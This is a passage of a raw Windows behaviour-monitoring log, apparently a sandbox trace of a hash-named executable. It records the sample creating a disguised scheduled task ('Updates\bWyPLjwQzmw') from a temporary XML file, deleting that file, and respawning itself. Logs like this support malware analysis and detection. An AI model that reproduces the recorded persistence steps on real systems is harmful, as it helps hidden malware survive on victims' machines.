powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\System32\zh-CN\tzres.dll.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\WinSxS\x86_system.data_b77a5c561934e089_4.0.15744.161_none_2c1622a959db26c0\System.Data.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\ws2_32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5740, 2928, FILE_chmod, C:\Windows\SysWOW64\gpapi.dll, attrib:0x00000000 , 
0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\crypt32.dll.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\coml2.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\wshext.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:108, 2928, FILE_chmod, C:\Windows\SysWOW64\OpcServices.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:108, 2928, FILE_chmod, C:\Windows\SysWOW64\xmllite.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:232, 2928, FILE_chmod, C:\Windows\SysWOW64\urlmon.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:108, 2928, FILE_chmod, C:\Windows\SysWOW64\tdh.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:232, 2928, FILE_chmod, C:\Windows\SysWOW64\iertutil.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5796, 2928, FILE_chmod, C:\Windows\SysWOW64\uxtheme.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5764, 2928, FILE_chmod, C:\Windows\SysWOW64\secur32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5740, 2928, FILE_chmod, C:\Windows\SysWOW64\msisip.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Numerics.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5776, 2928, FILE_chmod, C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0112~31bf3856ad364e35~amd64~~10.0.17763.1.cat, 
attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:108, 2928, FILE_chmod, C:\Windows\SysWOW64\mintdh.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\AppxSip.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5744, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.DirectoryServices.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:3720, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources\v4.0_4.0.0.0_zh-HANS_b77a5c561934e089\mscorlib.resources.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5752, 2928, FILE_chmod, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5444, 2928, FILE_chmod, C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5748, 2928, FILE_chmod, C:\Windows\WinSxS\x86_system.transactions_b77a5c561934e089_4.0.15744.161_none_ab0a76020e38cd6d\System.Transactions.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:641, powershell.exe, 5080:5800, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:641, powershell.exe, 5080:252, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:641, powershell.exe, 5080:5736, 2928, 
FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation.Resources\v4.0_3.0.0.0_zh-HANS_31bf3856ad364e35\System.Management.Automation.Resources.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:641, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:641, powershell.exe, 5080:5756, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:641, powershell.exe, 5080:232, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\v4.0_3.0.0.0_zh-HANS_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.Resources.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:672, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, PROC_exec, C:\Windows\SysWOW64\schtasks.exe, target_pid:5176 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' , 0x00000000 [操作成功完成。 ], 09:33:16:672, schtasks.exe, 5176:0, 2928, EXEC_create, C:\Windows\SysWOW64\schtasks.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' image_base:0x0000000000EE0000 image_size:0x00033000 , 0x00000000 [操作成功完成。 ], 09:33:16:672, powershell.exe, 5080:0, 2928, PROC_exec, C:\Windows\System32\conhost.exe, target_pid:7172 cmdline:'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1' , 0x00000000 [操作成功完成。 ], 09:33:16:672, powershell.exe, 5080:7324, 2928, REG_setval, 
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-2451103786-187343032-3810694054-1000\\Device\HarddiskVolume3\Windows\System32\conhost.exe, type:0x00000003 datalen:24 data:'0E 71 C7 C8 18 DA D9 01 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:672, conhost.exe, 7172:0, 2928, EXEC_create, C:\Windows\System32\conhost.exe, parent_pid:5080 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' image_base:0x00007FF6D5C20000 image_size:0x000D1000 , 0x00000000 [操作成功完成。 ], 09:33:16:672, schtasks.exe, 5176:0, 2928, PROC_exec, C:\Windows\System32\conhost.exe, target_pid:8100 cmdline:'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1' , 0x00000000 [操作成功完成。 ], 09:33:16:672, schtasks.exe, 5176:8784, 2928, REG_setval, HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-2451103786-187343032-3810694054-1000\\Device\HarddiskVolume3\Windows\System32\conhost.exe, type:0x00000003 datalen:24 data:'0E 71 C7 C8 18 DA D9 01 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:672, conhost.exe, 8100:0, 2928, EXEC_create, C:\Windows\System32\conhost.exe, parent_pid:5176 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' image_base:0x00007FF6D5C20000 image_size:0x000D1000 , 0x00000000 [操作成功完成。 ], 09:33:16:719, conhost.exe, 7172:0, 2928, EXEC_module_load, C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_05b6437c071e554b\comctl32.dll, base:0x00007FFCF2C50000 size:0x00279000 , 0x00000000 [操作成功完成。 ], 09:33:16:741, conhost.exe, 8100:0, 2928, EXEC_module_load, C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_05b6437c071e554b\comctl32.dll, base:0x00007FFCF2C50000 size:0x00279000 , 0x00000000 [操作成功完成。 ], 09:33:16:741, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\Microsoft.NET\Framework, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:758, powershell.exe, 5080:7324, 2928, FILE_readdir, 
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:758, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll, base:0x000000006A3B0000 size:0x0140E000 , 0x00000000 [操作成功完成。 ], 09:33:16:772, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:788, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:788, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:788, schtasks.exe, 5176:0, 2928, EXEC_destroy, C:\Windows\SysWOW64\schtasks.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' , 0x00000000 [操作成功完成。 ], 09:33:16:788, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:788, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_remove, C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp, , 0x00000000 [操作成功完成。 ], 09:33:16:804, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:804, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:804, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll, base:0x0000000069950000 size:0x00A55000 , 0x00000000 [操作成功完成。 ], 09:33:16:804, 
powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll, base:0x0000000069130000 size:0x00818000 , 0x00000000 [操作成功完成。 ], 09:33:16:804, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, PROC_exec, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, target_pid:8812 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:804, conhost.exe, 8100:0, 2928, EXEC_destroy, C:\Windows\System32\conhost.exe, parent_pid:5176 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' , 0x00000000 [操作成功完成。 ], 09:33:16:835, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8812:0, 2928, EXEC_destroy, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:835, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, PROC_exec, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, target_pid:7580 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:835, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 7580:0, 2928, EXEC_destroy, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:835, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, PROC_exec, 
C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, target_pid:4964 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:835, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, PROC_exec, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, target_pid:8452 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:850, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, PROC_exec, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, target_pid:8816 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:850, RuntimeBroker.exe, 4964:0, 2928, EXEC_destroy, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:850, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8452:0, 2928, EXEC_destroy, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:850, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, EXEC_create, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' image_base:0x0000000000820000 image_size:0x0008A000 , 0x00000000 
[操作成功完成。 ], 09:33:16:866, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\Microsoft.NET\Framework, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:866, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:866, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll, base:0x000000006A3B0000 size:0x0140E000 , 0x00000000 [操作成功完成。 ], 09:33:16:866, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:882, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:4640, 2928, FILE_touch, C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe.log, access:0x00120196 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000005 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:16:882, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:4640, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe.log, offset:0x00000000 datalen:0x00000516 , 0x00000000 [操作成功完成。 ], 09:33:16:882, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe.log, , 0x00000000 [操作成功完成。 ], 09:33:16:882, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, 
C:\Windows\assembly\NativeImages_v4.0.30319_32\System, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:882, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll, base:0x0000000069950000 size:0x00A55000 , 0x00000000 [操作成功完成。 ], 09:33:16:882, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\f95c1d21c350fd9102417341a1e75e5b\Microsoft.Management.Infrastructure.ni.dll, base:0x000000006C680000 size:0x00080000 , 0x00000000 [操作成功完成。 ], 09:33:16:882, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:882, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:897, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\Data\418A073AA3BC3475, type:0x00000003 datalen:114 data:'CB 04 00 00 00 00 00 00 04 00 04 00 01 02 02 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:917, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:917, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll, base:0x0000000069130000 size:0x00818000 , 0x00000000 [操作成功完成。 ], 09:33:16:929, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 
2928:0, 2928, EXEC_destroy, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:5192 cmdline:'C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe' , 0x00000000 [操作成功完成。 ], 09:33:16:929, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:929, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:929, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll, base:0x00000000689B0000 size:0x00774000 , 0x00000000 [操作成功完成。 ], 09:33:16:929, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:929, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:929, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:929, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll, base:0x0000000073EC0000 size:0x00106000 , 0x00000000 [操作成功完成。 ], 09:33:16:944, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:944, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, 
EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll, base:0x00000000689B0000 size:0x00774000 , 0x00000000 [操作成功完成。 ], 09:33:16:944, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:944, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:960, powershell.exe, 5080:7324, 2928, FILE_touch, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1, access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 , 0x00000000 [操作成功完成。 ], 09:33:16:960, powershell.exe, 5080:7324, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1, offset:0x00000000 datalen:0x0000004D , 0x00000000 [操作成功完成。 ], 09:33:16:960, powershell.exe, 5080:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1, , 0x00000000 [操作成功完成。 ], 09:33:16:960, powershell.exe, 5080:7324, 2928, FILE_touch, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1, access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 , 0x00000000 [操作成功完成。 ], 09:33:16:976, powershell.exe, 5080:7324, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1, offset:0x00000000 datalen:0x0000004D , 0x00000000 [操作成功完成。 ], 09:33:16:976, powershell.exe, 5080:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1, , 0x00000000 [操作成功完成。 ], 09:33:16:976, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\cfaa34000029b18fb89febf12cd0d80c\System.Management.ni.dll, base:0x000000006C730000 
size:0x00130000 , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_mkkey, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32, access:0x0002001B , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\EnableFileTracing, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\EnableAutoFileTracing, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\EnableConsoleTracing, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\FileTracingMask, type:0x00000004 datalen:4 data:'00 00 FF FF ' , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\ConsoleTracingMask, type:0x00000004 datalen:4 data:'00 00 FF FF ' , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\MaxFileSize, 